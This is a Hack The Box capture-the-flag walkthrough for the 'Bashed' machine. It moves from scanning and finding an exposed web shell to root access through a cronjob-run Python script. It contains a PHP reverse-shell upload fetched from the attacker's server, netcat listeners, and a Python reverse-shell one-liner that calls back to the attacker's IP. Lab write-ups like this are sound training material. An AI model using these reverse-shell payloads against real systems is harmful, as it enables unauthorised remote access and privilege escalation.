Comment on page
Bashed
HTB 8. Bashed
- 1.
nmap -A -T4 -p- 10.10.10.68
shows port 80 withApache httpd 2.4.18 (Ubuntu)
. - 2.
searchsploit apache 2.4
reveals localapache_ctl
exploit. - 3.Going to website
10.10.10.68
and looking at content shows that10.10.10.68/uploads
. exists. - 4.
dirbuster
time with medium wordlist which reveals several folders. - 5.View source code of pages shows nothing.
- 6.
dirbuster
founddev/phpbash.php
. - 7.Go to
10.10.10.68
and launchphpbash.php
which launches web terminal. - 8.
whoami
iswww-data
so lets get the user flag.cat /home/arrexel/user.txt
. - 9.test
sudo -l
andhistory
which shows we can becomescriptmanager
user without password. - 10.Can't change to
scriptmanager
because we are in a wbeshell without a tty. - 11.
cd /var/www/html/uploads/
and upload payload. - 12.
- 13.Edit the
$ip
and$port
to our ip and port1234
. - 14.Start web server
python -m SimpleHTTPServer 80
and runwet http://10.10.14.21/rev.php
on the target. - 15.Start netcat
nc -nvlp 1234
- 16.Go to
10.10.10.68/uploads/rev.php
to execute and connect. - 17.
- 18.Just go down the list and try the options. Try
python -c 'import pty; pty.spawn("/bin/bash")'
and no we are inbash
. - 19.
sudo su scriptmanager
does not work so lets try running a command as the usersudo -u scriptmanager /bin/bash
. - 20.
whoami
isscripmanager
andhistory
is none. - 21.
ls -la /
showsscriptmanager
owns/scripts
. - 22.
cd scripts
andls -la
showstest.py
andtest.txt
. - 23.The time modified for the
test.txt
changes every minute so a cronjob is running thetest.py
evvery minute as root. Lets change thetest.py
so it performs malicious actions. - 24.
- 25.Use
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",2345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);
(-i
is interactive mode) and download to target. - 26.Start listening
nc -nvlp 2345
and wait for shell.
Someone exploited with
CVE-2017-16995
found after running the linux-exploit-suggester
.Last modified 1yr ago